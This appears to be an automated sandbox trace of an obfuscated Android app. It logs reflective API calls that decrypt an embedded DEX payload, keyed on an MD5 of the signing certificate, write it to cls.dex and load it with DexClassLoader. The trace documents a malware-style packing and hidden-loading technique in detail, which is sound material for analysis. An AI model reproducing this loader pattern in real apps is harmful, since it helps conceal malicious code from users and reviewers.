  • $1: 050;~0*H0J10UUS10UUS10UUS10UUS10U10U0 171022132839Z21540914132839Z0J10UUS10UUS10UUS10UUS10U10U0"0*H0WX^jOK'x`CNG':QtC|pU1!},O?|:>.T3*ov]F#1oQ~+!'GyVo): UyM[52:~V$&] \CBv)J#=. NNkx=FoR]ro`j:>oX"sHZc)!00Uu.2:.'<[0*HWGTZH+Cc;jM?R)+VmPNAdG3"zh1znUjuYc\
  • $2: 308203353082021DA0030201020204063B7E16300D06092A864886F70D01010B0500304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B130031093007060355040313003020170D3137313032323133323833395A180F32313534303931343133323833395A304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B1300310930070603550403130030820122300D06092A864886F70D01010105000382010F003082010A0282010100B5570A585EFEF8E96A4F064B2778B1F7AFAE8CA78809A89C604308F794B84E47273AD21BF1517443ECFA7C70FC0C5592E9F131B2217D2CD4B14FA83F9B7C3A1CFEDB3ED42EFFD2C85433017FE0812AFDB91EA7BCD3F4EF6F7613E6E5E95D46F923316F86958EDBB8F4A751A5D1BF7ED22BC82127477956D4D7C0D08119F9D2EF9F6F29CA3A20BA5503B6798AD1E789BE4DC7C8F90CB3065BD135FE9C323A7E56EBCC2489E0265DCA20C3B35C434276294A84230EBEF4EC3D9AF1A5868A9B2E109820014EA1DF4E6BA818A3D18C78B7BB1617A014103D466F52C2905DEFE3726FCCBAB960C30B6AB13ABC3EB10E6FE7EC58FD22731C489809B8A75AE0E1E06329020301
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@6b42cac
  • $1: BROqnOXwFKWnWc
  • $2: 42524F716E4F5877464B576E5763
NameTypeValue
Return Valuejava.lang.String
  • toString: BROqnOXwFKWnWc
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1379e10a
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1e8d6798
  • $1: MD5
  • $2: 4D4435
NameTypeValue
Return Valuejava.lang.String
  • toString: MD5
API: java.security.MessageDigest->getInstance at etxtfvw.cqwwrwk.BROqnOXwFKWnWc:8 Show source
NameTypeValue
p0java.lang.String
  • toString: MD5
NameTypeValue
Return Valuejava.security.MessageDigest$MessageDigestImpl
  • toString: MESSAGE DIGEST MD5
API: java.security.MessageDigest->digest at etxtfvw.cqwwrwk.BROqnOXwFKWnWc:11 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@17b92fe
  • $1: 050;~0*H0J10UUS10UUS10UUS10UUS10U10U0 171022132839Z21540914132839Z0J10UUS10UUS10UUS10UUS10U10U0"0*H0WX^jOK'x`CNG':QtC|pU1!},O?|:>.T3*ov]F#1oQ~+!'GyVo): UyM[52:~V$&] \CBv)J#=. NNkx=FoR]ro`j:>oX"sHZc)!00Uu.2:.'<[0*HWGTZH+Cc;jM?R)+VmPNAdG3"zh1znUjuYc\
  • $2: 308203353082021DA0030201020204063B7E16300D06092A864886F70D01010B0500304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B130031093007060355040313003020170D3137313032323133323833395A180F32313534303931343133323833395A304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B1300310930070603550403130030820122300D06092A864886F70D01010105000382010F003082010A0282010100B5570A585EFEF8E96A4F064B2778B1F7AFAE8CA78809A89C604308F794B84E47273AD21BF1517443ECFA7C70FC0C5592E9F131B2217D2CD4B14FA83F9B7C3A1CFEDB3ED42EFFD2C85433017FE0812AFDB91EA7BCD3F4EF6F7613E6E5E95D46F923316F86958EDBB8F4A751A5D1BF7ED22BC82127477956D4D7C0D08119F9D2EF9F6F29CA3A20BA5503B6798AD1E789BE4DC7C8F90CB3065BD135FE9C323A7E56EBCC2489E0265DCA20C3B35C434276294A84230EBEF4EC3D9AF1A5868A9B2E109820014EA1DF4E6BA818A3D18C78B7BB1617A014103D466F52C2905DEFE3726FCCBAB960C30B6AB13ABC3EB10E6FE7EC58FD22731C489809B8A75AE0E1E06329020301
NameTypeValue
Return Valuejava.lang.Object
  • toString: [B@2e4a0657
  • $1: oL.mp&
  • $2: 6F0B4C2EBDF76DA41B9C70AB26E8851E
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:184 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@917062d
  • Arrays.toString: [[B@17b92fe]
NameTypeValue
Return Valuejava.lang.String
  • toString: 6f0b4c2ebdf76da41b9c70ab26e8851e
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@cd91b0
  • $1: oDOixVSpHMour
  • $2: 6F444F6978565370484D6F7572
NameTypeValue
Return Valuejava.lang.String
  • toString: oDOixVSpHMour
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2330b7ae
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@297218dc
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@29d4a0ba
  • $1: android.util.Base64
  • $2: 616E64726F69642E7574696C2E426173653634
NameTypeValue
Return Valuejava.lang.String
  • toString: android.util.Base64
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@e75e6c8
  • $1: decode
  • $2: 6465636F6465
NameTypeValue
Return Valuejava.lang.String
  • toString: decode
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@99c0e86
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2266a774
  • $1: android.util.Base64
  • $2: 616E64726F69642E7574696C2E426173653634
NameTypeValue
Return Valuejava.lang.String
  • toString: android.util.Base64
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@101a8d12
  • $1: DEFAULT
  • $2: 44454641554C54
NameTypeValue
Return Valuejava.lang.String
  • toString: DEFAULT
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:282 Show source
NameTypeValue
p0null
  • toString: null
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1100c6e0
  • Arrays.toString: [[B@11bbda4a, 0]
NameTypeValue
Return Valuejava.lang.Object
  • toString: [B@2b2d1d99
  • $1: RHhPeh/b;=Yd;0c6bDc2e2R%6da41b9c[gb$e8H51ee0b(2e`f7*>a4e9ckabl9e8d1e#d0bx.3e2fc7`48c`bd80e1b 3ePg7`48cd`b_d8K0e1b3eg7`48c`b3d8s0e1b3eg7`48c`bd80e1b3e%g7`48c`bd80e1b3eg7`48c`bd80e1b3eWg7`48cv`bwd8`0e\1bL3eg7`48c`bd80e1b73eqg7`48cu`bgd8f0e]1b3eg7`48c`bd80e!1b3eKg7`4w8c~`bfd8g0e]1bC3eg7`48c`bd80e1b3eg7`48c`bd80e31b?3elg7!`48c`bud8d0eY1bL3eg7`48c`bd80e1b;3e|g7`48c`b}
  • $2: 5203486804500765682F62093B9009B21E3D1AAEC5A059881C8564FC9D3B30630AF43662446332651A32522536646134316239635BA16762D124653848353165BE653062C8283265926066372A3E6134916539636BA561626C39653864E7316523643062782E336532666337DAEB6034DDED3863D9BF6062C3B96438CCBA3065CEE9316220F3336550F4673703F4603408F2386364A060625FA664384BA53065A4F63162ABF33365CEF46737F4F46034E4F23863DDA0606233A7643873A43065BFF73162A8F23365C5F5673785F56034F3F33863FBA16062EBA76438D1A43065CEF73162CBF2336525F66737B3F66034BFF03863A2A26062AFA464389AA7306591F4316298F13365D7F6673789F66034FDF03863E4A26062E4A46438E1A7306515F5316206F0336557F767370DF760340FF1386376A3606277A5643860A630655CF531624CF03365E9F76737A8F7603483F1386389A36062E1A56438D0A63065C1F5316237F7336571F067371EF0603409F6386375A4606267A2643866A130655DF23162B2F73365F6F067379FF0603486F63863E7A46062DBA26438C4A1306521F3316214F633654BF167371AF1603477F738637EA5606266A3643867A030655DF3316243F63365E1F16737A6F16034ACF738639DA560628AA36438FEA03065FAF33162E5F63365B8F16737D6F16034DAF73863C6A56062CAA36438C6A03065
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@19fd443f
  • $1: getBytes
  • $2: 6765744279746573
NameTypeValue
Return Valuejava.lang.String
  • toString: getBytes
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:302 Show source
NameTypeValue
p0java.lang.String
  • toString: 6f0b4c2ebdf76da41b9c70ab26e8851e
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@5a8fa55
NameTypeValue
Return Valuejava.lang.Object
  • toString: [B@17f6ac6a
  • $1: 6f0b4c2ebdf76da41b9c70ab26e8851e
  • $2: 3666306234633265626466373664613431623963373061623236653838353165
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.CNLldGq:306 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@3ad491f8
  • Arrays.toString: [[B@2b2d1d99, [B@17f6ac6a]
NameTypeValue
Return Valuejava.lang.Object
  • toString: [B@2ecbe6d1
  • $1: dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
  • $2: 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
API: etxtfvw.cqwwrwk->CNLldGq at etxtfvw.cqwwrwk.YRkFJMV:360 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@11bbda4a
NameTypeValue
Return Valuejava.lang.Object
  • toString: [B@2ecbe6d1
  • $1: dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
  • $2: 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:360 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@23cb2536
  • Arrays.toString: [[B@11bbda4a]
NameTypeValue
Return Valuejava.lang.Object
  • toString: [B@2ecbe6d1
  • $1: dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
  • $2: 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2ebcd5a4
  • $1: java.io.FileOutputStream
  • $2: 6A6176612E696F2E46696C654F757470757453747265616D
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.FileOutputStream
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:374 Show source
NameTypeValue
p0java.lang.String
  • toString: java.io.FileOutputStream
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.io.FileOutputStream
  • getName: java.io.FileOutputStream
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@18c3a810
  • $1: java.io.File
  • $2: 6A6176612E696F2E46696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: java.io.File
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:389 Show source
NameTypeValue
p0java.lang.String
  • toString: java.io.File
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.io.File
  • getName: java.io.File
API: java.lang.reflect.Constructor->newInstance at etxtfvw.cqwwrwk.YRkFJMV:402 Show source
NameTypeValue
p0java.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
NameTypeValue
Return Valuejava.io.FileOutputStream
  • toString: java.io.FileOutputStream@2895bb2f
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1d9e22c5
  • $1: write
  • $2: 7772697465
NameTypeValue
Return Valuejava.lang.String
  • toString: write
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@254cdb4b
  • $1: [B
  • $2: 5B42
NameTypeValue
Return Valuejava.lang.String
  • toString: [B
API: java.lang.Class->forName at etxtfvw.cqwwrwk.YRkFJMV:735 Show source
NameTypeValue
p0java.lang.String
  • toString: [B
NameTypeValue
Return Valuejava.lang.Class
  • toString: class [B
  • getName: [B
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:739 Show source
NameTypeValue
p0java.lang.String
  • toString: write
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@b0547e6
  • Arrays.toString: [class [B]
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public void java.io.OutputStream.write(byte[]) throws java.io.IOException
  • getName: write
API: java.io.FileOutputStream->write at etxtfvw.cqwwrwk.YRkFJMV:750 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@2ecbe6d1
  • $1: dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
  • $2: 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
NameTypeValue
Return Valuenull
  • toString: null
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:750 Show source
NameTypeValue
p0java.io.FileOutputStream
  • toString: java.io.FileOutputStream@2895bb2f
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@11d2efd4
  • Arrays.toString: [[B@2ecbe6d1]
NameTypeValue
Return Valuenull
  • toString: null
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@33cdfc72
  • $1: close
  • $2: 636C6F7365
NameTypeValue
Return Valuejava.lang.String
  • toString: close
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:766 Show source
NameTypeValue
p0java.lang.String
  • toString: close
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@21593540
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public void java.io.FileOutputStream.close() throws java.io.IOException
  • getName: close
API: java.io.FileOutputStream->close at etxtfvw.cqwwrwk.YRkFJMV:775 Show source
NameTypeValue
Return Valuenull
  • toString: null
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:775 Show source
NameTypeValue
p0java.io.FileOutputStream
  • toString: java.io.FileOutputStream@2895bb2f
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1dfb6dbe
NameTypeValue
Return Valuenull
  • toString: null
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@e3c656c
  • $1: parent
  • $2: 706172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: parent
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@5fca7ca
  • $1: parent
  • $2: 706172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: parent
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@7406c58
  • $1: parent
  • $2: 706172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: parent
API: java.lang.Class->getDeclaredField at etxtfvw.cqwwrwk.YRkFJMV:680 Show source
NameTypeValue
p0java.lang.String
  • toString: parent
NameTypeValue
Return Valuejava.lang.reflect.Field
  • toString: private java.lang.ClassLoader java.lang.ClassLoader.parent
  • getName: parent
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@11d527ed
  • $1: getAbsolutePath
  • $2: 6765744162736F6C75746550617468
NameTypeValue
Return Valuejava.lang.String
  • toString: getAbsolutePath
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:828 Show source
NameTypeValue
p0java.lang.String
  • toString: getAbsolutePath
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@3c4808b3
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.lang.String java.io.File.getAbsolutePath()
  • getName: getAbsolutePath
API: java.io.File->getAbsolutePath at etxtfvw.cqwwrwk.YRkFJMV:838 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:838 Show source
NameTypeValue
p0java.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@9e955e9
NameTypeValue
Return Valuejava.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@31b07d0f
  • $1: getParentFile
  • $2: 676574506172656E7446696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: getParentFile
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:855 Show source
NameTypeValue
p0java.lang.String
  • toString: getParentFile
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@21f867a5
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.io.File java.io.File.getParentFile()
  • getName: getParentFile
API: java.io.File->getParentFile at etxtfvw.cqwwrwk.YRkFJMV:865 Show source
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:865 Show source
NameTypeValue
p0java.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1181db2b
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@28c6b146
  • $1: getParent
  • $2: 676574506172656E74
NameTypeValue
Return Valuejava.lang.String
  • toString: getParent
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:882 Show source
NameTypeValue
p0java.lang.String
  • toString: getParent
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@e4ae834
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.lang.String java.io.File.getParent()
  • getName: getParent
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@25e484a3
  • $1: getParentFile
  • $2: 676574506172656E7446696C65
NameTypeValue
Return Valuejava.lang.String
  • toString: getParentFile
API: java.lang.Class->getMethod at etxtfvw.cqwwrwk.YRkFJMV:899 Show source
NameTypeValue
p0java.lang.String
  • toString: getParentFile
p1[Ljava.lang.Class;
  • toString: [Ljava.lang.Class;@b868b59
NameTypeValue
Return Valuejava.lang.reflect.Method
  • toString: public java.io.File java.io.File.getParentFile()
  • getName: getParentFile
API: java.io.File->getParentFile at etxtfvw.cqwwrwk.YRkFJMV:909 Show source
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:909 Show source
NameTypeValue
p0java.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1e30c7ff
NameTypeValue
Return Valuejava.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
API: java.io.File->getParent at etxtfvw.cqwwrwk.YRkFJMV:916 Show source
NameTypeValue
Return Valuejava.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns
API: java.lang.reflect.Method->invoke at etxtfvw.cqwwrwk.YRkFJMV:916 Show source
NameTypeValue
p0java.io.File
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files
p1[Ljava.lang.Object;
  • toString: [Ljava.lang.Object;@1b8b8415
NameTypeValue
Return Valuejava.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@13e8f6b8
  • $1: dalvik.system.DexClassLoader
  • $2: 64616C76696B2E73797374656D2E446578436C6173734C6F61646572
NameTypeValue
Return Valuejava.lang.String
  • toString: dalvik.system.DexClassLoader
API: java.lang.Class->forName at etxtfvw.cqwwrwk.uxONpX:25 Show source
NameTypeValue
p0java.lang.String
  • toString: dalvik.system.DexClassLoader
NameTypeValue
Return Valuejava.lang.Class
  • toString: class dalvik.system.DexClassLoader
  • getName: dalvik.system.DexClassLoader
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@1392c664
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
API: java.lang.Class->forName at etxtfvw.cqwwrwk.uxONpX:36 Show source
NameTypeValue
p0java.lang.String
  • toString: java.lang.String
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.lang.String
  • getName: java.lang.String
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@264fdc93
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
API: java.lang.Class->forName at etxtfvw.cqwwrwk.uxONpX:46 Show source
NameTypeValue
p0java.lang.String
  • toString: java.lang.String
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.lang.String
  • getName: java.lang.String
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@173e0fce
  • $1: java.lang.String
  • $2: 6A6176612E6C616E672E537472696E67
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.String
API: java.lang.Class->forName at etxtfvw.cqwwrwk.uxONpX:56 Show source
NameTypeValue
p0java.lang.String
  • toString: java.lang.String
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.lang.String
  • getName: java.lang.String
API: java.lang.String-><init> at etxtfvw.cqwwrwk.unFeJNljZsjaw:43 Show source
NameTypeValue
p0java.lang.Object
  • toString: [B@21169c85
  • $1: java.lang.ClassLoader
  • $2: 6A6176612E6C616E672E436C6173734C6F61646572
NameTypeValue
Return Valuejava.lang.String
  • toString: java.lang.ClassLoader
API: java.lang.Class->forName at etxtfvw.cqwwrwk.uxONpX:66 Show source
NameTypeValue
p0java.lang.String
  • toString: java.lang.ClassLoader
NameTypeValue
Return Valuejava.lang.Class
  • toString: class java.lang.ClassLoader
  • getName: java.lang.ClassLoader
API: java.lang.reflect.Constructor->newInstance at etxtfvw.cqwwrwk.uxONpX:83 Show source
NameTypeValue
p0java.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
p1java.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns
p2java.lang.String
  • toString: /data/data/com.czybg.eqtbdmzpklrgyns/lib
p3dalvik.system.PathClassLoader
  • toString: dalvik.system.PathClassLoader[DexPathList[[zip file "/data/app/com.czybg.eqtbdmzpklrgyns-1/base.apk"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
NameTypeValue
Return Valuedalvik.system.DexClassLoader
  • toString: dalvik.system.DexClassLoader[DexPathList[[dex file "/data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
API: java.lang.Class->getDeclaredField at etxtfvw.cqwwrwk.YRkFJMV:942 Show source
NameTypeValue
p0java.lang.String
  • toString: mBase
NameTypeValue
Return Valuejava.lang.reflect.Field
  • toString: android.content.Context android.content.ContextWrapper.mBase
  • getName: mBase
API: java.lang.reflect.Field->get at etxtfvw.cqwwrwk.YRkFJMV:952 Show source
NameTypeValue
p0etxtfvw.cqwwrwk
  • toString: etxtfvw.cqwwrwk@32c17d93
NameTypeValue
Return Valueandroid.app.ContextImpl
  • toString: android.app.ContextImpl@2d30d73d
API: java.lang.Class->getDeclaredField at etxtfvw.cqwwrwk.YRkFJMV:960 Show source
NameTypeValue
p0java.lang.String
  • toString: mMainThread
NameTypeValue
Return Valuejava.lang.reflect.Field
  • toString: final android.app.ActivityThread android.app.ContextImpl.mMainThread
